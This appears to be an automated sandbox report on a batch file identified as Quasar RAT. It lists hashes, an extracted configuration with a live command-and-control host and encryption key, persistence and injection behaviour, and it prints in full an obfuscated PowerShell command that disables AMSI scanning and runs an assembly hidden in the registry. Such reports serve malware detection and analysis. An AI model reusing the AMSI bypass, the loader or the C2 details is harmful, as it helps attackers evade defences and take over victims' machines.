quasar | 45e68be3e89afc1bec174219bccc5a9388efda16b46c69304dfcd87c0d9657f7

Analysis

max time kernel
41s
max time network
21s
platform
windows10-1703_x64
resource
win10-20240404-en
resource tags

arch:x64arch:x86image:win10-20240404-enlocale:en-usos:windows10-1703-x64system
submitted
14-05-2024 23:36

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

Uni.bat
Size

515KB
MD5

4c2a3be3d5c9464eb441677e41f44fd8
SHA1

c826034a0882d21a39056d745e88622ee9698343
SHA256

45e68be3e89afc1bec174219bccc5a9388efda16b46c69304dfcd87c0d9657f7
SHA512

ccf12f0e439393f4fef5531ef89a62411feeaed9d7f0751e9e4c5fb366d1cd0059a11e0a12002b851ff138701f69d65ce7ad69f1bcb6e3944481311311c8f27c
SSDEEP

12288:OOCZeIh9XQFAbCbtqTUGLYPSow/QWEO2b:4zh9+3tZGEw/b2b

Score

10^/10

quasar slave execution spyware trojan

Malware Config

Extracted

Family

quasar

Version

3.1.5

Botnet

SLAVE

review-tops.gl.at.ply.gg:48212

Mutex

$Sxr-IGnkORFTlshRl7BdTw

Attributes

encryption_key
YDmRBA8wExjQkYgGrHhN
install_name
$sxr-powershell.exe
log_directory
Logs
reconnect_delay
3000
startup_key
Discord
subdirectory
$77

Signatures

Quasar RAT
Quasar is an open source Remote Access Tool.
trojan spyware quasar

Quasar payload 1 IoCs

Processes:

resource	yara_rule
behavioral2/memory/1484-199-0x0000000009770000-0x00000000097DC000-memory.dmp	family_quasar

Suspicious use of NtCreateUserProcessOtherParentProcess 1 IoCs

Processes:

powershell.EXE

description pid process target process

PID 3148 created 588 3148 powershell.EXE winlogon.exe
Blocklisted process makes network request 3 IoCs

Processes:

powershell.exe

flow pid process

2 1484 powershell.exe
4 1484 powershell.exe
8 1484 powershell.exe
Command and Scripting Interpreter: PowerShell 1 TTPs 3 IoCs
Run Powershell and hide display window.
execution

PowerShell
T1059.001

Processes:

powershell.exepowershell.exepowershell.exe

pid process

1676 powershell.exe
1484 powershell.exe
5076 powershell.exe
Downloads MZ/PE file
Executes dropped EXE 2 IoCs

Processes:

$sxr-powershell.exeinstall.exe

pid process

1580 $sxr-powershell.exe
4352 install.exe
Legitimate hosting services abused for malware hosting/C2 1 TTPs 2 IoCs

Web Service
T1102

Processes:

flow ioc

5 raw.githubusercontent.com
8 raw.githubusercontent.com
Looks up external IP address via web service 1 IoCs
Uses a legitimate IP lookup service to find the infected system's external IP.

Processes:

flow ioc

1 ip-api.com

description	pid	process	target process
PID 3148 created 588	3148	powershell.EXE	winlogon.exe

flow	pid	process
2	1484	powershell.exe
4	1484	powershell.exe
8	1484	powershell.exe

pid	process
1676	powershell.exe
1484	powershell.exe
5076	powershell.exe

pid	process
1580	$sxr-powershell.exe
4352	install.exe

flow	ioc
5	raw.githubusercontent.com
8	raw.githubusercontent.com

flow	ioc
1	ip-api.com

Drops file in System32 directory 2 IoCs

Processes:

powershell.EXE

description	ioc	process
File created	C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive	powershell.EXE
File created	C:\Windows\system32\config\systemprofile\AppData\Local\Microsoft\CLR_v4.0\UsageLogs\powershell.EXE.log	powershell.EXE

Suspicious use of SetThreadContext 1 IoCs

Processes:

powershell.EXE

description pid process target process

PID 3148 set thread context of 4960 3148 powershell.EXE dllhost.exe
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082
Creates scheduled task(s) 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
persistence

Scheduled Task/Job
T1053

Processes:

schtasks.exe

pid process

2376 schtasks.exe

description	pid	process	target process
PID 3148 set thread context of 4960	3148	powershell.EXE	dllhost.exe

pid	process
2376	schtasks.exe

Modifies data under HKEY_USERS 42 IoCs

Processes:

powershell.EXE

description	ioc	process
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\Certificates	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\Certificates	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CTLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CRLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\Certificates	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\Certificates	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\Certificates	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\Certificates	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CTLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CTLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\Certificates	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CRLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\CTLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\CTLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CTLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\trust\CRLs	powershell.EXE
Set value (data)	\REGISTRY\USER\.DEFAULT\Software\Classes\Local Settings\MuiCache\1a\52C64B7E\LanguageList = 65006e002d0055005300000065006e0000000000	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CTLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Disallowed\CRLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CRLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CRLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\SmartCardRoot\CTLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\Certificates	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CRLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\Windows\CurrentVersion\WinTrust\Trust Providers\Software Publishing	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\CA\Certificates	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\CA\CRLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\Disallowed\CTLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\Root\CRLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Microsoft\SystemCertificates\TrustedPeople\CRLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\TrustedPeople\CTLs	powershell.EXE
Key created	\REGISTRY\USER\.DEFAULT\Software\Policies\Microsoft\SystemCertificates\trust\Certificates	powershell.EXE

Modifies registry class 1 IoCs

Processes:

powershell.exe

description ioc process

Key created \REGISTRY\USER\S-1-5-21-3699363923-1875576828-3287151903-1000_Classes\Local Settings powershell.exe
Runs net.exe

description	ioc	process
Key created	\REGISTRY\USER\S-1-5-21-3699363923-1875576828-3287151903-1000_Classes\Local Settings	powershell.exe

Suspicious behavior: EnumeratesProcesses 64 IoCs

Processes:

powershell.exepowershell.exepowershell.exe$sxr-powershell.exepowershell.EXEdllhost.exe

pid	process
5076	powershell.exe
5076	powershell.exe
5076	powershell.exe
1676	powershell.exe
1676	powershell.exe
1676	powershell.exe
1484	powershell.exe
1484	powershell.exe
1484	powershell.exe
1580	$sxr-powershell.exe
1580	$sxr-powershell.exe
3148	powershell.EXE
1580	$sxr-powershell.exe
3148	powershell.EXE
3148	powershell.EXE
3148	powershell.EXE
4960	dllhost.exe
4960	dllhost.exe
4960	dllhost.exe
4960	dllhost.exe
1580	$sxr-powershell.exe
4960	dllhost.exe
4960	dllhost.exe
4960	dllhost.exe
4960	dllhost.exe
4960	dllhost.exe
4960	dllhost.exe
4960	dllhost.exe
4960	dllhost.exe
4960	dllhost.exe
4960	dllhost.exe
4960	dllhost.exe
4960	dllhost.exe
4960	dllhost.exe
4960	dllhost.exe
4960	dllhost.exe
4960	dllhost.exe
4960	dllhost.exe
4960	dllhost.exe
4960	dllhost.exe
4960	dllhost.exe
4960	dllhost.exe
4960	dllhost.exe
4960	dllhost.exe
4960	dllhost.exe
4960	dllhost.exe
4960	dllhost.exe
4960	dllhost.exe
4960	dllhost.exe
4960	dllhost.exe
4960	dllhost.exe
4960	dllhost.exe
4960	dllhost.exe
4960	dllhost.exe
4960	dllhost.exe
4960	dllhost.exe
4960	dllhost.exe
4960	dllhost.exe
4960	dllhost.exe
4960	dllhost.exe
4960	dllhost.exe
4960	dllhost.exe
4960	dllhost.exe
4960	dllhost.exe

Suspicious use of AdjustPrivilegeToken 64 IoCs

Processes:

powershell.exepowershell.exe

description	pid	process
Token: SeDebugPrivilege	5076	powershell.exe
Token: SeDebugPrivilege	1676	powershell.exe
Token: SeIncreaseQuotaPrivilege	1676	powershell.exe
Token: SeSecurityPrivilege	1676	powershell.exe
Token: SeTakeOwnershipPrivilege	1676	powershell.exe
Token: SeLoadDriverPrivilege	1676	powershell.exe
Token: SeSystemProfilePrivilege	1676	powershell.exe
Token: SeSystemtimePrivilege	1676	powershell.exe
Token: SeProfSingleProcessPrivilege	1676	powershell.exe
Token: SeIncBasePriorityPrivilege	1676	powershell.exe
Token: SeCreatePagefilePrivilege	1676	powershell.exe
Token: SeBackupPrivilege	1676	powershell.exe
Token: SeRestorePrivilege	1676	powershell.exe
Token: SeShutdownPrivilege	1676	powershell.exe
Token: SeDebugPrivilege	1676	powershell.exe
Token: SeSystemEnvironmentPrivilege	1676	powershell.exe
Token: SeRemoteShutdownPrivilege	1676	powershell.exe
Token: SeUndockPrivilege	1676	powershell.exe
Token: SeManageVolumePrivilege	1676	powershell.exe
Token: 33	1676	powershell.exe
Token: 34	1676	powershell.exe
Token: 35	1676	powershell.exe
Token: 36	1676	powershell.exe
Token: SeIncreaseQuotaPrivilege	1676	powershell.exe
Token: SeSecurityPrivilege	1676	powershell.exe
Token: SeTakeOwnershipPrivilege	1676	powershell.exe
Token: SeLoadDriverPrivilege	1676	powershell.exe
Token: SeSystemProfilePrivilege	1676	powershell.exe
Token: SeSystemtimePrivilege	1676	powershell.exe
Token: SeProfSingleProcessPrivilege	1676	powershell.exe
Token: SeIncBasePriorityPrivilege	1676	powershell.exe
Token: SeCreatePagefilePrivilege	1676	powershell.exe
Token: SeBackupPrivilege	1676	powershell.exe
Token: SeRestorePrivilege	1676	powershell.exe
Token: SeShutdownPrivilege	1676	powershell.exe
Token: SeDebugPrivilege	1676	powershell.exe
Token: SeSystemEnvironmentPrivilege	1676	powershell.exe
Token: SeRemoteShutdownPrivilege	1676	powershell.exe
Token: SeUndockPrivilege	1676	powershell.exe
Token: SeManageVolumePrivilege	1676	powershell.exe
Token: 33	1676	powershell.exe
Token: 34	1676	powershell.exe
Token: 35	1676	powershell.exe
Token: 36	1676	powershell.exe
Token: SeIncreaseQuotaPrivilege	1676	powershell.exe
Token: SeSecurityPrivilege	1676	powershell.exe
Token: SeTakeOwnershipPrivilege	1676	powershell.exe
Token: SeLoadDriverPrivilege	1676	powershell.exe
Token: SeSystemProfilePrivilege	1676	powershell.exe
Token: SeSystemtimePrivilege	1676	powershell.exe
Token: SeProfSingleProcessPrivilege	1676	powershell.exe
Token: SeIncBasePriorityPrivilege	1676	powershell.exe
Token: SeCreatePagefilePrivilege	1676	powershell.exe
Token: SeBackupPrivilege	1676	powershell.exe
Token: SeRestorePrivilege	1676	powershell.exe
Token: SeShutdownPrivilege	1676	powershell.exe
Token: SeDebugPrivilege	1676	powershell.exe
Token: SeSystemEnvironmentPrivilege	1676	powershell.exe
Token: SeRemoteShutdownPrivilege	1676	powershell.exe
Token: SeUndockPrivilege	1676	powershell.exe
Token: SeManageVolumePrivilege	1676	powershell.exe
Token: 33	1676	powershell.exe
Token: 34	1676	powershell.exe
Token: 35	1676	powershell.exe

Suspicious use of WriteProcessMemory 64 IoCs

Processes:

cmd.exenet.exepowershell.exeWScript.execmd.exenet.exepowershell.exepowershell.EXEdllhost.exe

description	pid	process	target process
PID 4788 wrote to memory of 3920	4788	cmd.exe	net.exe
PID 4788 wrote to memory of 3920	4788	cmd.exe	net.exe
PID 3920 wrote to memory of 312	3920	net.exe	net1.exe
PID 3920 wrote to memory of 312	3920	net.exe	net1.exe
PID 4788 wrote to memory of 5076	4788	cmd.exe	powershell.exe
PID 4788 wrote to memory of 5076	4788	cmd.exe	powershell.exe
PID 4788 wrote to memory of 5076	4788	cmd.exe	powershell.exe
PID 5076 wrote to memory of 1676	5076	powershell.exe	powershell.exe
PID 5076 wrote to memory of 1676	5076	powershell.exe	powershell.exe
PID 5076 wrote to memory of 1676	5076	powershell.exe	powershell.exe
PID 5076 wrote to memory of 4680	5076	powershell.exe	WScript.exe
PID 5076 wrote to memory of 4680	5076	powershell.exe	WScript.exe
PID 5076 wrote to memory of 4680	5076	powershell.exe	WScript.exe
PID 4680 wrote to memory of 3180	4680	WScript.exe	cmd.exe
PID 4680 wrote to memory of 3180	4680	WScript.exe	cmd.exe
PID 4680 wrote to memory of 3180	4680	WScript.exe	cmd.exe
PID 3180 wrote to memory of 3172	3180	cmd.exe	net.exe
PID 3180 wrote to memory of 3172	3180	cmd.exe	net.exe
PID 3180 wrote to memory of 3172	3180	cmd.exe	net.exe
PID 3172 wrote to memory of 1472	3172	net.exe	net1.exe
PID 3172 wrote to memory of 1472	3172	net.exe	net1.exe
PID 3172 wrote to memory of 1472	3172	net.exe	net1.exe
PID 3180 wrote to memory of 1484	3180	cmd.exe	powershell.exe
PID 3180 wrote to memory of 1484	3180	cmd.exe	powershell.exe
PID 3180 wrote to memory of 1484	3180	cmd.exe	powershell.exe
PID 1484 wrote to memory of 2376	1484	powershell.exe	schtasks.exe
PID 1484 wrote to memory of 2376	1484	powershell.exe	schtasks.exe
PID 1484 wrote to memory of 2376	1484	powershell.exe	schtasks.exe
PID 1484 wrote to memory of 1580	1484	powershell.exe	$sxr-powershell.exe
PID 1484 wrote to memory of 1580	1484	powershell.exe	$sxr-powershell.exe
PID 1484 wrote to memory of 1580	1484	powershell.exe	$sxr-powershell.exe
PID 1484 wrote to memory of 4352	1484	powershell.exe	install.exe
PID 1484 wrote to memory of 4352	1484	powershell.exe	install.exe
PID 1484 wrote to memory of 4352	1484	powershell.exe	install.exe
PID 3148 wrote to memory of 4960	3148	powershell.EXE	dllhost.exe
PID 3148 wrote to memory of 4960	3148	powershell.EXE	dllhost.exe
PID 3148 wrote to memory of 4960	3148	powershell.EXE	dllhost.exe
PID 3148 wrote to memory of 4960	3148	powershell.EXE	dllhost.exe
PID 3148 wrote to memory of 4960	3148	powershell.EXE	dllhost.exe
PID 3148 wrote to memory of 4960	3148	powershell.EXE	dllhost.exe
PID 3148 wrote to memory of 4960	3148	powershell.EXE	dllhost.exe
PID 3148 wrote to memory of 4960	3148	powershell.EXE	dllhost.exe
PID 4960 wrote to memory of 588	4960	dllhost.exe	winlogon.exe
PID 4960 wrote to memory of 644	4960	dllhost.exe	lsass.exe
PID 4960 wrote to memory of 748	4960	dllhost.exe	svchost.exe
PID 4960 wrote to memory of 920	4960	dllhost.exe	svchost.exe
PID 4960 wrote to memory of 1004	4960	dllhost.exe	dwm.exe
PID 4960 wrote to memory of 628	4960	dllhost.exe	svchost.exe
PID 4960 wrote to memory of 964	4960	dllhost.exe	svchost.exe
PID 4960 wrote to memory of 1028	4960	dllhost.exe	svchost.exe
PID 4960 wrote to memory of 1120	4960	dllhost.exe	svchost.exe
PID 4960 wrote to memory of 1152	4960	dllhost.exe	svchost.exe
PID 4960 wrote to memory of 1228	4960	dllhost.exe	svchost.exe
PID 4960 wrote to memory of 1236	4960	dllhost.exe	svchost.exe
PID 4960 wrote to memory of 1244	4960	dllhost.exe	svchost.exe
PID 4960 wrote to memory of 1312	4960	dllhost.exe	svchost.exe
PID 4960 wrote to memory of 1428	4960	dllhost.exe	svchost.exe
PID 4960 wrote to memory of 1448	4960	dllhost.exe	svchost.exe
PID 4960 wrote to memory of 1460	4960	dllhost.exe	svchost.exe
PID 4960 wrote to memory of 1516	4960	dllhost.exe	svchost.exe
PID 4960 wrote to memory of 1592	4960	dllhost.exe	svchost.exe
PID 4960 wrote to memory of 1636	4960	dllhost.exe	svchost.exe
PID 4960 wrote to memory of 1660	4960	dllhost.exe	svchost.exe
PID 4960 wrote to memory of 1740	4960	dllhost.exe	svchost.exe

C:\Windows\system32\winlogon.exe
winlogon.exe
1⤵
PID:588

C:\Windows\system32\dwm.exe
"dwm.exe"
2⤵
PID:1004

C:\Windows\System32\dllhost.exe
C:\Windows\System32\dllhost.exe /Processid:{077e7d17-7617-47cd-bb89-f88fc290e436}
2⤵
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:4960

C:\Windows\system32\lsass.exe
C:\Windows\system32\lsass.exe
1⤵
PID:644

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k dcomlaunch -s PlugPlay
1⤵
PID:748

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k dcomlaunch -s LSM
1⤵
PID:920

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k localservicenetworkrestricted -s lmhosts
1⤵
PID:628

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k localsystemnetworkrestricted -s NcbService
1⤵
PID:964

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s gpsvc
1⤵
PID:1028

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k localservicenetworkrestricted -s EventLog
1⤵
PID:1120

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s Schedule
1⤵
PID:1152

c:\windows\system32\taskhostw.exe
taskhostw.exe {222A245B-E637-4AE9-A93F-A59CA119A75E}
2⤵
PID:3000

C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE
C:\Windows\System32\WindowsPowerShell\v1.0\powershell.EXE "function Local:yiWlpoXETqcL{Param([OutputType([Type])][Parameter(Position=0)][Type[]]$mbKCpVrijndTWs,[Parameter(Position=1)][Type]$SmPJtqTdvg)$XpuXdXBHfDi=[AppDomain]::CurrentDomain.DefineDynamicAssembly((New-Object Reflection.AssemblyName(''+'R'+''+[Char](101)+'fl'+[Char](101)+'c'+[Char](116)+''+[Char](101)+''+[Char](100)+''+'D'+''+[Char](101)+''+[Char](108)+'e'+[Char](103)+''+'a'+''+'t'+''+[Char](101)+'')),[Reflection.Emit.AssemblyBuilderAccess]::Run).DefineDynamicModule(''+[Char](73)+''+[Char](110)+'M'+[Char](101)+''+[Char](109)+'o'+'r'+''+[Char](121)+''+'M'+''+[Char](111)+''+'d'+'ul'+'e'+'',$False).DefineType(''+[Char](77)+''+[Char](121)+''+[Char](68)+'e'+[Char](108)+''+'e'+''+'g'+''+[Char](97)+''+[Char](116)+''+[Char](101)+''+'T'+''+[Char](121)+''+[Char](112)+''+[Char](101)+'',''+[Char](67)+''+[Char](108)+''+[Char](97)+''+[Char](115)+''+[Char](115)+''+[Char](44)+''+'P'+''+[Char](117)+''+[Char](98)+''+[Char](108)+''+[Char](105)+''+[Char](99)+','+[Char](83)+''+'e'+''+[Char](97)+''+[Char](108)+'ed'+[Char](44)+'A'+'n'+''+'s'+''+[Char](105)+''+'C'+'l'+[Char](97)+'s'+[Char](115)+''+','+''+'A'+'ut'+'o'+'C'+'l'+''+'a'+''+[Char](115)+'s',[MulticastDelegate]);$XpuXdXBHfDi.DefineConstructor(''+[Char](82)+''+[Char](84)+''+[Char](83)+''+[Char](112)+''+[Char](101)+'c'+'i'+'a'+[Char](108)+''+[Char](78)+''+'a'+''+[Char](109)+''+[Char](101)+',H'+[Char](105)+''+'d'+''+[Char](101)+'B'+[Char](121)+''+[Char](83)+'i'+'g'+''+[Char](44)+'P'+'u'+''+[Char](98)+''+'l'+''+[Char](105)+'c',[Reflection.CallingConventions]::Standard,$mbKCpVrijndTWs).SetImplementationFlags(''+'R'+''+[Char](117)+''+'n'+''+[Char](116)+''+[Char](105)+'m'+'e'+''+','+'Man'+'a'+''+[Char](103)+''+[Char](101)+''+[Char](100)+'');$XpuXdXBHfDi.DefineMethod(''+'I'+''+[Char](110)+''+[Char](118)+''+'o'+''+[Char](107)+''+[Char](101)+'','P'+[Char](117)+''+[Char](98)+'l'+[Char](105)+''+'c'+','+[Char](72)+''+[Char](105)+''+[Char](100)+'e'+'B'+''+[Char](121)+''+'S'+''+[Char](105)+''+'g'+''+[Char](44)+''+[Char](78)+'e'+'w'+''+[Char](83)+''+'l'+'ot'+[Char](44)+''+'V'+'i'+'r'+'t'+[Char](117)+'al',$SmPJtqTdvg,$mbKCpVrijndTWs).SetImplementationFlags(''+'R'+''+[Char](117)+''+[Char](110)+''+[Char](116)+'i'+'m'+''+[Char](101)+',M'+[Char](97)+''+[Char](110)+''+'a'+''+[Char](103)+''+[Char](101)+''+[Char](100)+'');Write-Output $XpuXdXBHfDi.CreateType();}$uCWQSGgSprovo=([AppDomain]::CurrentDomain.GetAssemblies()|Where-Object{$_.GlobalAssemblyCache -And $_.Location.Split('\')[-1].Equals(''+[Char](83)+''+[Char](121)+'s'+'t'+''+'e'+''+[Char](109)+'.d'+'l'+''+[Char](108)+'')}).GetType(''+[Char](77)+''+[Char](105)+''+'c'+'ro'+'s'+'oft'+'.'+''+[Char](87)+'in'+[Char](51)+'2'+[Char](46)+''+[Char](85)+'n'+[Char](115)+''+[Char](97)+''+[Char](102)+''+[Char](101)+'N'+[Char](97)+''+[Char](116)+''+'i'+''+'v'+''+[Char](101)+''+'M'+''+[Char](101)+''+[Char](116)+'h'+[Char](111)+''+[Char](100)+''+'s'+'');$eNiIQmyarIQBrx=$uCWQSGgSprovo.GetMethod('G'+'e'+''+[Char](116)+'P'+'r'+''+[Char](111)+'cA'+[Char](100)+''+'d'+'r'+[Char](101)+''+[Char](115)+''+[Char](115)+'',[Reflection.BindingFlags](''+[Char](80)+''+[Char](117)+''+'b'+''+[Char](108)+''+'i'+''+[Char](99)+''+','+''+'S'+''+[Char](116)+''+'a'+''+'t'+'i'+[Char](99)+''),$Null,[Reflection.CallingConventions]::Any,@((New-Object IntPtr).GetType(),[string]),$Null);$LDgVQjvStbXIbOlHJfB=yiWlpoXETqcL @([String])([IntPtr]);$LjUlMBnLPNpFVhPmASeoEf=yiWlpoXETqcL @([IntPtr],[UIntPtr],[UInt32],[UInt32].MakeByRefType())([Bool]);$mYjKGToXJMG=$uCWQSGgSprovo.GetMethod(''+[Char](71)+'e'+[Char](116)+'M'+'o'+''+[Char](100)+''+'u'+'leHa'+[Char](110)+''+'d'+''+'l'+''+[Char](101)+'').Invoke($Null,@([Object](''+'k'+'er'+[Char](110)+''+[Char](101)+''+[Char](108)+''+[Char](51)+''+[Char](50)+'.d'+'l'+'l')));$UWiyvTxEvsKFOJ=$eNiIQmyarIQBrx.Invoke($Null,@([Object]$mYjKGToXJMG,[Object]('L'+'o'+''+[Char](97)+''+[Char](100)+'L'+[Char](105)+''+'b'+''+[Char](114)+'a'+[Char](114)+''+'y'+''+[Char](65)+'')));$xPlKuozCDAPFfnxXC=$eNiIQmyarIQBrx.Invoke($Null,@([Object]$mYjKGToXJMG,[Object]('V'+[Char](105)+''+[Char](114)+''+[Char](116)+'u'+[Char](97)+''+[Char](108)+''+'P'+''+[Char](114)+''+[Char](111)+''+'t'+''+'e'+''+'c'+''+[Char](116)+'')));$kDrFjpi=[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($UWiyvTxEvsKFOJ,$LDgVQjvStbXIbOlHJfB).Invoke('a'+[Char](109)+'si'+[Char](46)+'d'+'l'+'l');$dhlrXigwkNQUngzRT=$eNiIQmyarIQBrx.Invoke($Null,@([Object]$kDrFjpi,[Object](''+[Char](65)+''+'m'+''+[Char](115)+''+[Char](105)+''+[Char](83)+'c'+[Char](97)+'n'+'B'+''+[Char](117)+''+[Char](102)+''+'f'+''+[Char](101)+'r')));$XioOdLMBMG=0;[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($xPlKuozCDAPFfnxXC,$LjUlMBnLPNpFVhPmASeoEf).Invoke($dhlrXigwkNQUngzRT,[uint32]8,4,[ref]$XioOdLMBMG);[Runtime.InteropServices.Marshal]::Copy([Byte[]](0xb8,0x57,0,7,0x80,0xc3),0,$dhlrXigwkNQUngzRT,6);[Runtime.InteropServices.Marshal]::GetDelegateForFunctionPointer($xPlKuozCDAPFfnxXC,$LjUlMBnLPNpFVhPmASeoEf).Invoke($dhlrXigwkNQUngzRT,[uint32]8,0x20,[ref]$XioOdLMBMG);[Reflection.Assembly]::Load([Microsoft.Win32.Registry]::LocalMachine.OpenSubkey(''+[Char](83)+'OF'+[Char](84)+''+[Char](87)+''+'A'+''+[Char](82)+''+[Char](69)+'').GetValue(''+'$'+''+[Char](55)+''+'7'+''+[Char](115)+''+[Char](116)+'a'+[Char](103)+'e'+[Char](114)+'')).EntryPoint.Invoke($Null,$Null)"
2⤵
- Suspicious use of NtCreateUserProcessOtherParentProcess
- Drops file in System32 directory
- Suspicious use of SetThreadContext
- Modifies data under HKEY_USERS
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of WriteProcessMemory
PID:3148

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s ProfSvc
1⤵
PID:1228

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k localservice -s EventSystem
1⤵
PID:1236

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s Themes
1⤵
PID:1244

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k localservice -s nsi
1⤵
PID:1312

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s SENS
1⤵
PID:1428

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k localservicenetworkrestricted -s Dhcp
1⤵
PID:1448

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s UserManager
1⤵
PID:1460

c:\windows\system32\sihost.exe
sihost.exe
2⤵
PID:2840

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k localsystemnetworkrestricted -s AudioEndpointBuilder
1⤵
PID:1516

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k networkservice -s NlaSvc
1⤵
PID:1592

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k networkservice -s Dnscache
1⤵
PID:1636

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted
1⤵
PID:1660

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k localservice -s netprofm
1⤵
PID:1740

C:\Windows\System32\svchost.exe
C:\Windows\System32\svchost.exe -k LocalServiceNetworkRestricted
1⤵
PID:1788

C:\Windows\system32\svchost.exe
C:\Windows\system32\svchost.exe -k LocalServiceNetworkRestricted
1⤵
PID:1796

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k appmodel -s StateRepository
1⤵
PID:1892

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s ShellHWDetection
1⤵
PID:1908

C:\Windows\System32\spoolsv.exe
C:\Windows\System32\spoolsv.exe
1⤵
PID:1376

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k networkservice -s LanmanWorkstation
1⤵
PID:2076

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k netsvcs -s Winmgmt
1⤵
PID:2204

c:\windows\system32\svchost.exe
c:\windows\system32\svchost.exe -k appmodel -s tiledatamodelsvc
1⤵
PID:2268

